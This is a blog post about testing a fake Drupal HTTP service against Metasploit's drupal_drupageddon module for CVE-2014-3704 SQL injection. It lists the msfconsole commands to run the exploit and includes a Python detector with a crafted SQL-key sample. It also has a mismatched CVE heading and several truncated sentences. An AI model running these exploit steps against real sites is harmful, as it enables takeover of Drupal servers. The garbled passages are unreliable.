Thursday, October 30, 2014

[Toolkit] Simple Web Service - SimpleHttp.groovy - CVE:2014-3704

Preface 
Here we will show how to use the toolkit SimpleHttp.groovy to help us exploit CVE:2014-3704 from Metasploit. First, let's check our target CVE: 
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.

Drupal is a package that provides a content-management framework over an HTTP service. An attacker can use this CVE, which leverages SQL injection, to create an account with administrator privileges and then do whatever he or she wants. 

The exploit code from Metasploit is called Drupal HTTP Parameter Key/Value SQL Injection. When you read the code you can observe that the actions below are taken to exploit the target server: 
* Use CVE:2014-3704 to create an account with administrator privilege.
* Post an article which uses a reverse shell so the attacker can control the target server.
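As an added example (not part of the original post or of the SimpleHttp.groovy toolkit), here is a small Python checker that a fake-service handler or a request log parser could run over the POST body of a Drupal login request. It flags array-style form keys (name[...]) whose inner key is not a plain integer or identifier, since that is exactly what expandArguments would splice into the prepared statement. The form bodies used are constructed samples.

```python
import re
from urllib.parse import parse_qsl

# Drupal's expandArguments turns an array-valued parameter such as name[0]
# into a placeholder named after the array key. A key that is not a plain
# integer or identifier ends up inside the SQL text, which is the core of
# CVE-2014-3704. Only keys matching this pattern are considered clean.
SAFE_KEY = re.compile(r'^[A-Za-z0-9_]*$')

# Matches a form field of the shape  base[inner]  (after URL decoding).
ARRAY_FIELD = re.compile(r'^([^\[]+)\[(.*)\]$', re.S)


def extract_array_keys(form_body: str):
    """Yield (base, inner_key) for every bracketed field in a form body."""
    for field, _value in parse_qsl(form_body, keep_blank_values=True):
        m = ARRAY_FIELD.match(field)
        if m:
            yield m.group(1), m.group(2)


def suspicious_keys(form_body: str):
    """Return the (base, inner_key) pairs that would not survive as a clean placeholder."""
    return [(base, key) for base, key in extract_array_keys(form_body)
            if not SAFE_KEY.match(key)]


def is_drupageddon_like(form_body: str) -> bool:
    """True when at least one array key would be interpolated into the query."""
    return bool(suspicious_keys(form_body))


# Constructed sample bodies: a normal login post and one carrying a crafted key
# (the ';' is percent-encoded as %3B, which is how a client would send it).
BENIGN_BODY = "name=admin&pass=secret&form_id=user_login_block"
CRAFTED_BODY = "name%5B0%3BSELECT%201%5D=x&name%5B0%5D=y&pass=z&form_id=user_login_block"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("crafted", CRAFTED_BODY)):
        print(label, is_drupageddon_like(body), suspicious_keys(body))
```

Because the check looks at the decoded key rather than at SQL keywords, it also catches variants that use different SQL text in the same key position.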

Toolkit Usage 
In the current version of SimpleHttp.groovy, it should be used under the MSFConsoleATF framework. We will develop a different HTTP handler for each CVE as a single .groovy file and store it under path/ibm/iss/xf/tk/services/cve/http/. So in this case there should be a groovy file called "CVE2014_3704_.groovy" in the folder mentioned before. The  means a different implementation for each attacking script. (For metasploit, the x=1

Start Http Service At Exploitable Target 
Please enter  and use the command below to start the Fake HTTP Service for CVE2014-3704: 
# ls # The content inside 
ibm libs poc scripts test
# groovy -cp "libs/*" ibm/iss/xf/tk/services/SimpleHttp.groovy CVE2014_3704_1 # Loading CVE2014_3704_1 handler
[Info] Listen on NIF=eth0: /172.16.58.50
[Info] Loading Handler='CVE2014_3704_1'...
[Info] WDir=/root/MSFConsoleATF...
[Info] Parsing class...
[Info] Create and register Handler...
[Test] Initialize...
[Info] Start Fake Http Service...

Run CVE-2014-6271 Through Metasploit 
Now let's move to Kali Linux. Please type "msfconsole" in the terminal to enter the MSF interface: 
# msfconsole
...
msf > // Now we are in MSF interface

Let's search for our target CVE: 
msf> search cve:2014-3704
...
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
...

The next step is to use this exploit: 
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) >

Let's check how to use this exploit: 
msf exploit(drupal_drupageddon) > show options

Here we have to set RHOST to the IP of the host running the Fake HTTP service and run the exploit: 
msf exploit(drupal_drupageddon) > set RHOST 172.16.58.50
RHOST => 172.16.58.50
msf exploit(drupal_drupageddon) > run # Start exploit
...
[*] 172.16.58.50:80 - Calling preview page. Exploit should trigger...

msf exploit(drupal_drupageddon) >

Let's go back to the Fake HTTP Server console; it has recorded all the attacking behavior: 


Supplement 
[Toolkit] Simple Web Service - SimpleHttp.groovy
